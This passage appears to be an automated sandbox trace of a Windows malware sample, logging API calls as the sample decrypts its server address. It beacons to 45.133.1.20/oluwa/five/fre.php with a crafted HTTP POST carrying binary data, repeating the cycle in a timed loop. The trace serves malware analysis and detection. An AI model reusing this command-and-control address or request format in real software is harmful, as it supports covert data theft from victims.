ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0299.395] GetProcessHeap () returned 0x6a0000 [0299.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0299.398] socket (af=2, type=1, protocol=6) returned 0xb48 [0299.399] connect (s=0xb48, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0299.426] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0299.426] GetProcessHeap () returned 0x6a0000 [0299.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0299.517] GetProcessHeap () returned 0x6a0000 [0299.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0299.518] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.519] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.519] GetProcessHeap () returned 0x6a0000 [0299.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dac48 [0299.519] GetProcessHeap () returned 0x6a0000 [0299.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.520] GetProcessHeap () returned 0x6a0000 [0299.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0299.520] GetProcessHeap () returned 0x6a0000 [0299.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0299.521] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.522] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.522] GetProcessHeap () returned 0x6a0000 [0299.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0299.522] GetProcessHeap () returned 0x6a0000 [0299.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.523] send (s=0xb48, buf=0x6bd460*, len=242, flags=0) returned 242 [0299.523] send (s=0xb48, buf=0x6bb998*, len=159, flags=0) returned 159 [0299.523] GetProcessHeap () returned 0x6a0000 [0299.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0299.524] recv (in: s=0xb48, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0299.600] GetProcessHeap () returned 0x6a0000 [0299.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0299.601] GetProcessHeap () returned 0x6a0000 [0299.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0299.601] GetProcessHeap () returned 0x6a0000 [0299.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dac48 | out: hHeap=0x6a0000) returned 1 [0299.602] GetProcessHeap () returned 0x6a0000 [0299.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0299.602] closesocket (s=0xb48) returned 0 [0299.603] GetProcessHeap () returned 0x6a0000 [0299.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0299.603] GetProcessHeap () returned 0x6a0000 [0299.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.605] GetProcessHeap () returned 0x6a0000 [0299.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0299.605] GetProcessHeap () returned 0x6a0000 [0299.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0299.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1874) returned 0xb48 [0299.609] Sleep (dwMilliseconds=0xea60) [0299.611] GetProcessHeap () returned 0x6a0000 [0299.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0299.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.613] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.626] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0299.639] GetProcessHeap () returned 0x6a0000 [0299.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0299.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.641] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0299.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.642] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.655] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.655] GetProcessHeap () returned 0x6a0000 [0299.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0299.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.657] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0299.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.658] CryptDestroyKey (hKey=0x6ad020) returned 1 [0299.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.660] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0299.660] GetProcessHeap () returned 0x6a0000 [0299.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.662] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.663] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.667] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.669] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.669] GetProcessHeap () returned 0x6a0000 [0299.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0299.671] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.671] GetProcessHeap () returned 0x6a0000 [0299.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0299.672] GetProcessHeap () returned 0x6a0000 [0299.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.672] GetProcessHeap () returned 0x6a0000 [0299.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0299.672] GetProcessHeap () returned 0x6a0000 [0299.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0299.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.674] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.684] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0299.693] GetProcessHeap () returned 0x6a0000 [0299.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0299.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.694] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0299.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.696] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.697] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.697] GetProcessHeap () returned 0x6a0000 [0299.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0299.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.702] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0299.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.703] CryptDestroyKey (hKey=0x6ad020) returned 1 [0299.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.718] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0299.718] GetProcessHeap () returned 0x6a0000 [0299.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.720] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0299.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.722] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0299.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.725] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0299.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.727] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0299.727] GetProcessHeap () returned 0x6a0000 [0299.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0299.727] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0299.728] GetProcessHeap () returned 0x6a0000 [0299.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0299.728] socket (af=2, type=1, protocol=6) returned 0xb4c [0299.731] connect (s=0xb4c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0299.757] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0299.757] GetProcessHeap () returned 0x6a0000 [0299.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0299.757] GetProcessHeap () returned 0x6a0000 [0299.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0299.758] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.759] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.759] GetProcessHeap () returned 0x6a0000 [0299.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da888 [0299.759] GetProcessHeap () returned 0x6a0000 [0299.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.760] GetProcessHeap () returned 0x6a0000 [0299.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0299.760] GetProcessHeap () returned 0x6a0000 [0299.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0299.761] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0299.762] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.763] GetProcessHeap () returned 0x6a0000 [0299.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0299.763] GetProcessHeap () returned 0x6a0000 [0299.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0299.763] send (s=0xb4c, buf=0x6bd460*, len=242, flags=0) returned 242 [0299.764] send (s=0xb4c, buf=0x6bb998*, len=159, flags=0) returned 159 [0299.764] GetProcessHeap () returned 0x6a0000 [0299.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0299.764] recv (in: s=0xb4c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0299.830] GetProcessHeap () returned 0x6a0000 [0299.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0299.831] GetProcessHeap () returned 0x6a0000 [0299.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0299.832] GetProcessHeap () returned 0x6a0000 [0299.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da888 | out: hHeap=0x6a0000) returned 1 [0299.832] GetProcessHeap () returned 0x6a0000 [0299.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0299.834] closesocket (s=0xb4c) returned 0 [0299.835] GetProcessHeap () returned 0x6a0000 [0299.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0299.835] GetProcessHeap () returned 0x6a0000 [0299.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.835] GetProcessHeap () returned 0x6a0000 [0299.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0299.836] GetProcessHeap () returned 0x6a0000 [0299.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0299.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1878) returned 0xb4c [0299.839] Sleep (dwMilliseconds=0xea60) [0299.841] GetProcessHeap () returned 0x6a0000 [0299.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0299.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.842] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.867] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0299.883] GetProcessHeap () returned 0x6a0000 [0299.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0299.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.884] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0299.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.885] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.886] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.886] GetProcessHeap () returned 0x6a0000 [0299.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0299.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.889] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0299.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.890] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0299.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.891] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0299.891] GetProcessHeap () returned 0x6a0000 [0299.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.892] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.893] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.894] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.895] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.895] GetProcessHeap () returned 0x6a0000 [0299.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0299.895] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.896] GetProcessHeap () returned 0x6a0000 [0299.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0299.896] GetProcessHeap () returned 0x6a0000 [0299.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0299.897] GetProcessHeap () returned 0x6a0000 [0299.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0299.897] GetProcessHeap () returned 0x6a0000 [0299.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0299.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0299.924] GetProcessHeap () returned 0x6a0000 [0299.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0299.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.942] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0299.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.947] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.948] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.948] GetProcessHeap () returned 0x6a0000 [0299.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0299.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.950] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0299.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.951] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0299.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0299.953] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0299.953] GetProcessHeap () returned 0x6a0000 [0299.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0299.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.955] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0299.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.956] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0299.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.957] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0299.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.959] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0299.959] GetProcessHeap () returned 0x6a0000 [0299.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0299.959] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0299.959] GetProcessHeap () returned 0x6a0000 [0299.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0299.959] socket (af=2, type=1, protocol=6) returned 0xb50 [0299.959] connect (s=0xb50, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0299.986] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0299.986] GetProcessHeap () returned 0x6a0000 [0299.986] RtlAllocateHeap (HeapHandle=0x6a0000, 